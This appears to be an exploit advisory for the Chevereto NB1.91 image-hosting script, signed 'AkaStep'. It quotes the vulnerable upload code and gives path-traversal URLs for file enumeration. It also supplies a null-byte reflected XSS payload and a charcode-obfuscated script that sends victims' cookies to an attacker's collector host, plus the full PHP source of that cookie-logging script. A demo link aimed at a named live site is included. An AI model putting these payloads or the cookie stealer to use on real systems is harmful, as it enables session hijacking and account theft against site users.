======================================================================================== Vulnerable Software: Chevereto upload script Downloaded from: http://code.google.com/p/chevereto/downloads/list (http://code.google.com/p/chevereto/downloads/detail?name=chevereto_nb1.91.zip&can=2&q=) Official site: http://chevereto.com/ chevereto_nb1.91.zip Nightly Build 1.91 Featured Oct 2010 471 KB 32167 ======================================================================================== About software:See from vendor: http://chevereto.com/ chevereto is outstanding Image Hosting Script (c) chevereto.com ======================================================================================== Tested: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 MYSQL: 5.5.23 ======================================================================================== Vuln Desc: Vulnerable Code Section //http://site.tld/whereunpacked/Upload/engine.php if ($modo==2 || $modo==3) { // INFORMACION (ANCHO, ALTO y PESO) if ($modo==2) { if ($_GET['v']) { $id = $_GET['v']; $imagen = DIR_IM.$id; if (file_exists($imagen)==true) { $titulo = SEEING.' '.$id.' '.AT.' '; $info = getimagesize($imagen); //Obtenemos la informacion $statinfo = @stat($imagen); $ancho = $info[0]; $alto = $info[1]; $mime = $info['mime']; $tamano = $statinfo['size']; //Bytes $tamano_kb = round($tamano*0.0009765625, 2); $canales = $info['channels']; } else { unset($modo); $modo = 1; $spit = true; $errormsg = NOT_EXISTS; $titulo = NOT_EXISTS_TITLE.ESP_TITULO; } } } // LAS URL $URLimg = URL_SCRIPT.DIR_IM.$name; $URLthm = URL_SCRIPT.DIR_TH.$name; $URLvim = URL_SCRIPT.'?v='.$name; $URLshr = $URLvim; // Para no cambiar mas abajo $eu_img = urlencode($URLimg); File existense enumeration: http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php Non persistent cROSS siTE sCRIPTING (XSS) http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script> Note:*Null byte* usage is neccessary here when exploiting XSS.See the vulnerable code section. =======XSS STEAL COOKIE======== http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00</title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,48,46,49,53,47,108,101,97,114,110,47,119,111,114,107,47,120,115,115,46,112,104,112,63,116,120,116,61,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62));</script> ============EOF================ our charcoded XSS payload in this case is: <script>location.replace("http://192.168.0.15/learn/work/xss.php?txt="+document.cookie)</script> And Finally: //xss.php = is our cookie stealer. <?php error_reporting('off'); if(isset($_GET['txt'])) { $cleanupitfirst=base64_encode(htmlentities($_GET['txt'])); $file='./s.txt'; $handle=fopen($file,'a+'); fwrite($handle,PHP_EOL .'============Decode It==========='. PHP_EOL .$cleanupitfirst. PHP_EOL . '============END OF==========='.PHP_EOL); fclose($handle); } die('<script>location.replace("http://return_back.tld/blabla/");</script>'); Demo: http://pics.openarmenia.com/?v=../index.php%00%3Cscript%3Ealert%281%29;%3C/script%3E //Chevereto NB1.6 rev2 ======================================================================================== Due trust to this issuse we can say previous versions too is affected by this vulns. =================================== EOF ================================================= ++++My Special Thanks to:++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com && to all AA Team &&+ to all Azerbaijani Black Hatz;) ++++++++++++++++++++++++++++++ Thank you. /AkaStep ^_^